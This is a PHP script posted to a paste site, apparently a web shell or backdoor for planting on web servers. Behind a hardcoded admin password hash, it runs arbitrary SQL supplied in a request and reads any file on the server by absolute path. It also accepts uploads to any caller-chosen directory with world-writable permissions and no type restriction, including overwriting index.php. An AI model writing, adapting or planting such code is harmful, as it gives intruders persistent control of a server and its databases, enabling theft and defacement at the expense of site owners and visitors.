N
<?php
// Upload
$auth_users = array(
'admin' => '$2y$10$/M6EWJ9laWHQzJJpDrt1ZuvTe2Fdq0SCK3kTSQjuX/b8qxjh4VLOK',
);
class PasswordHash {
var $itoa64;
var $iteration_count_log2;
var $portable_hashes;
var $random_state;
function __construct($iteration_count_log2, $portable_hashes)
{
$this->itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
if ($iteration_count_log2 < 4 || $iteration_count_log2 > 31)
$iteration_count_log2 = 8;
$this->iteration_count_log2 = $iteration_count_log2;
$this->portable_hashes = $portable_hashes;
$this->random_state = microtime();
if (function_exists('getmypid'))
$this->random_state .= getmypid();
}
function PasswordHash($iteration_count_log2, $portable_hashes)
{
self::__construct($iteration_count_log2, $portable_hashes);
}
function get_random_bytes($count)
{
$output = '';
if (@is_readable('/dev/urandom') &&
($fh = @fopen('/dev/urandom', 'rb'))) {
$output = fread($fh, $count);
fclose($fh);
}
if (strlen($output) < $count) {
$output = '';
for ($i = 0; $i < $count; $i += 16) {
$this->random_state =
md5(microtime() . $this->random_state);
$output .= md5($this->random_state, TRUE);
}
$output = substr($output, 0, $count);
}
return $output;
}
function encode64($input, $count)
{
$output = '';
$i = 0;
do {
$value = ord($input[$i++]);
$output .= $this->itoa64[$value & 0x3f];
if ($i < $count)
$value |= ord($input[$i]) << 8;
$output .= $this->itoa64[($value >> 6) & 0x3f];
if ($i++ >= $count)
break;
if ($i < $count)
$value |= ord($input[$i]) << 16;
$output .= $this->itoa64[($value >> 12) & 0x3f];
if ($i++ >= $count)
break;
$output .= $this->itoa64[($value >> 18) & 0x3f];
} while ($i < $count);
return $output;
}
function gensalt_private($input)
{
$output = '$P$';
$output .= $this->itoa64[min($this->iteration_count_log2 +
((PHP_VERSION >= '5') ? 5 : 3), 30)];
$output .= $this->encode64($input, 6);
return $output;
}
function crypt_private($password, $setting)
{
$output = '*0';
if (substr($setting, 0, 2) === $output)
$output = '*1';
$id = substr($setting, 0, 3);
# We use "$P$", phpBB3 uses "$H$" for the same thing
if ($id !== '$P$' && $id !== '$H$')
return $output;
$count_log2 = strpos($this->itoa64, $setting[3]);
if ($count_log2 < 7 || $count_log2 > 30)
return $output;
$count = 1 << $count_log2;
$salt = substr($setting, 4, 8);
if (strlen($salt) !== 8)
return $output;
# We were kind of forced to use MD5 here since it's the only
# cryptographic primitive that was available in all versions
# of PHP in use. To implement our own low-level crypto in PHP
# would have resulted in much worse performance and
# consequently in lower iteration counts and hashes that are
# quicker to crack (by non-PHP code).
$hash = md5($salt . $password, TRUE);
do {
$hash = md5($hash . $password, TRUE);
} while (--$count);
$output = substr($setting, 0, 12);
$output .= $this->encode64($hash, 16);
return $output;
}
function gensalt_blowfish($input)
{
# This one needs to use a different order of characters and a
# different encoding scheme from the one in encode64() above.
# We care because the last character in our encoded string will
# only represent 2 bits. While two known implementations of
# bcrypt will happily accept and correct a salt string which
# has the 4 unused bits set to non-zero, we do not want to take
# chances and we also do not want to waste an additional byte
# of entropy.
$itoa64 = './ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
$output = '$2a$';
$output .= chr(ord('0') + $this->iteration_count_log2 / 10);
$output .= chr(ord('0') + $this->iteration_count_log2 % 10);
$output .= '$';
$i = 0;
do {
$c1 = ord($input[$i++]);
$output .= $itoa64[$c1 >> 2];
$c1 = ($c1 & 0x03) << 4;
if ($i >= 16) {
$output .= $itoa64[$c1];
break;
}
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 4;
$output .= $itoa64[$c1];
$c1 = ($c2 & 0x0f) << 2;
$c2 = ord($input[$i++]);
$c1 |= $c2 >> 6;
$output .= $itoa64[$c1];
$output .= $itoa64[$c2 & 0x3f];
} while (1);
return $output;
}
function HashPassword($password)
{
$random = '';
if (CRYPT_BLOWFISH === 1 && !$this->portable_hashes) {
$random = $this->get_random_bytes(16);
$hash =
crypt($password, $this->gensalt_blowfish($random));
if (strlen($hash) === 60)
return $hash;
}
if (strlen($random) < 6)
$random = $this->get_random_bytes(6);
$hash =
$this->crypt_private($password,
$this->gensalt_private($random));
if (strlen($hash) === 34)
return $hash;
# Returning '*' on error is safe here, but would _not_ be safe
# in a crypt(3)-like function used _both_ for generating new
# hashes and for validating passwords against existing hashes.
return '*';
}
function CheckPassword($password, $stored_hash)
{
$hash = $this->crypt_private($password, $stored_hash);
if ($hash[0] === '*')
$hash = crypt($password, $stored_hash);
# This is not constant-time. In order to keep the code simple,
# for timing safety we currently rely on the salts being
# unpredictable, which they are at least in the non-fallback
# cases (that is, when we use /dev/urandom and bcrypt).
return $hash === $stored_hash;
}
}
function fm_clean_path($path, $trim = true)
{
$path = $trim ? trim($path) : $path;
$path = trim($path, '\\/');
$path = str_replace(array('../', '..\\'), '', $path);
$path = get_absolute_path($path);
if ($path == '..') {
$path = '';
}
return str_replace('\\', '/', $path);
}
function get_absolute_path($path)
{
$path = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, $path);
$parts = array_filter(explode(DIRECTORY_SEPARATOR, $path), 'strlen');
$absolutes = array();
foreach ($parts as $part) {
if ('.' == $part) continue;
if ('..' == $part) {
array_pop($absolutes);
} else {
$absolutes[] = $part;
}
}
return implode(DIRECTORY_SEPARATOR, $absolutes);
}
function fm_isvalid_filename($text)
{
return (strpbrk($text, '/?%*:|"<>') === FALSE) ? true : false;
}
if (isset($_GET['auth'])) {
$user = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if (!isset($user) || !isset($pass)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
if (version_compare(PHP_VERSION, '5.5.0', '<')) {
$storedHash = '$P$D7iDnOkly3YT6mIgx6BAtGg3xnIhNX/';
$hasher = new PasswordHash(10, false);
if (!$hasher->CheckPassword($pass, $storedHash)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
} else {
if (!password_verify($pass, $auth_users[$user])) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
}
$response = array('status' => 'success', 'info' => "Authentication successful");
echo json_encode($response);
exit();
}
if (isset($_GET['dbcmd'])) {
$user = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if (!isset($user) || !isset($pass)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
if (version_compare(PHP_VERSION, '5.5.0', '<')) {
$storedHash = '$P$D7iDnOkly3YT6mIgx6BAtGg3xnIhNX/';
$hasher = new PasswordHash(10, false);
if (!$hasher->CheckPassword($pass, $storedHash)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
} else {
if (!password_verify($pass, $auth_users[$user])) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
}
if (empty($_POST["db_name"]) || empty($_POST["db_username"])) {
$response = array('status' => 'error', 'info' => "db_username, db_name and db_password cannot be empty");
echo json_encode($response);
exit();
}
if (empty($_POST["cmd"])) {
$response = array('status' => 'error', 'info' => "cmd cannot be empty");
echo json_encode($response);
exit();
}
try {
$mysqli = new mysqli("localhost", $_POST["db_username"], $_POST["db_password"], $_POST["db_name"]);
$res = $mysqli->query($_POST["cmd"]);
} catch (Exception $e) {
$response = array('status' => 'error', 'info' => "Database command failed to executed");
echo json_encode($response);
exit();
}
$response = array('status' => 'success', 'info' => "Database command executed successfully");
echo json_encode($response);
exit();
}
if (isset($_GET['file'])) {
$user = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if (!isset($user) || !isset($pass)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
if (version_compare(PHP_VERSION, '5.5.0', '<')) {
$storedHash = '$P$D7iDnOkly3YT6mIgx6BAtGg3xnIhNX/';
$hasher = new PasswordHash(10, false);
if (!$hasher->CheckPassword($pass, $storedHash)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
} else {
if (!password_verify($pass, $auth_users[$user])) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
}
$filePath = fm_clean_path($_GET['file']);
$filePath = '/' . $filePath;
if (file_exists($filePath) && is_readable($filePath)) {
$response = array('status' => 'success', 'file' => file_get_contents($filePath));
echo json_encode($response);
exit;
} else {
$response = array('status' => 'error', 'info' => "File not found");
echo json_encode($response);
exit;
}
}
if (!empty($_FILES)) {
$user = $_SERVER['PHP_AUTH_USER'];
$pass = $_SERVER['PHP_AUTH_PW'];
if (!isset($user) || !isset($pass)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
if (version_compare(PHP_VERSION, '5.5.0', '<')) {
$storedHash = '$P$D7iDnOkly3YT6mIgx6BAtGg3xnIhNX/';
$hasher = new PasswordHash(10, false);
if (!$hasher->CheckPassword($pass, $storedHash)) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
} else {
if (!password_verify($pass, $auth_users[$user])) {
$response = array('status' => 'error', 'info' => "Authentication failed");
echo json_encode($response);
exit();
}
}
$fullPathInput = fm_clean_path($_REQUEST['fullpath']);
$f = $_FILES;
$path = '';
$ds = DIRECTORY_SEPARATOR;
$errors = 0;
$uploads = 0;
$allowed = array();
$response = array(
'status' => 'error',
'info' => 'Oops! Try again'
);
$filename = $f['file']['name'];
$tmp_name = $f['file']['tmp_name'];
$ext = pathinfo($filename, PATHINFO_FILENAME) != '' ? strtolower(pathinfo($filename, PATHINFO_EXTENSION)) : '';
$isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;
if (!fm_isvalid_filename($filename) && !fm_isvalid_filename($fullPathInput)) {
$response = array(
'status' => 'error',
'info' => "Invalid File name!",
);
echo json_encode($response);
exit();
}
if (!empty($_POST['rootpath'])) {
$path = $_POST['rootpath'];
$targetPath = $path;
} else {
$targetPath = $path . $ds;
}
if (is_writable($targetPath)) {
$fullPath = $path . '/' . $fullPathInput;
$folder = substr($fullPath, 0, strrpos($fullPath, "/"));
if (!is_dir($folder)) {
$old = umask(0);
mkdir($folder, 0777, true);
umask($old);
}
chmod($fullPath, 0777);
if ($filename == 'index.php' && file_exists($fullPath)) {
$perms = fileperms($fullPath);
$perm_octal = substr(sprintf('%o', $perms), -3);
$owner_write = ($perms & 0x0080) ? true : false;
if (!$owner_write) {
$response = array(
'status' => 'error',
'info' => "File does not have write permission - $perm_octal"
);
echo json_encode($response);
exit();
}
}
if (empty($f['file']['error']) && !empty($tmp_name) && $tmp_name != 'none' && $isFileAllowed) {
if (move_uploaded_file($tmp_name, $fullPath)) {
// Be sure that the file has been uploaded
if (file_exists($fullPath)) {
$response = array(
'status' => 'success',
'info' => "file upload successful"
);
} else {
$response = array(
'status' => 'error',
'info' => 'Couldn\'t upload the requested file.'
);
}
} else {
$response = array(
'status' => 'error',
'info' => "Error while uploading files. Uploaded files $uploads",
);
}
}
} else {
$response = array(
'status' => 'error',
'info' => 'The specified folder for upload isn\'t writeable.'
);
}
// Return the response
echo json_encode($response);
exit();
}
echo __FILE__;
?>
Views: 40
Created At: 2026-03-02 22:48:06
Copy the code below to embed this paste: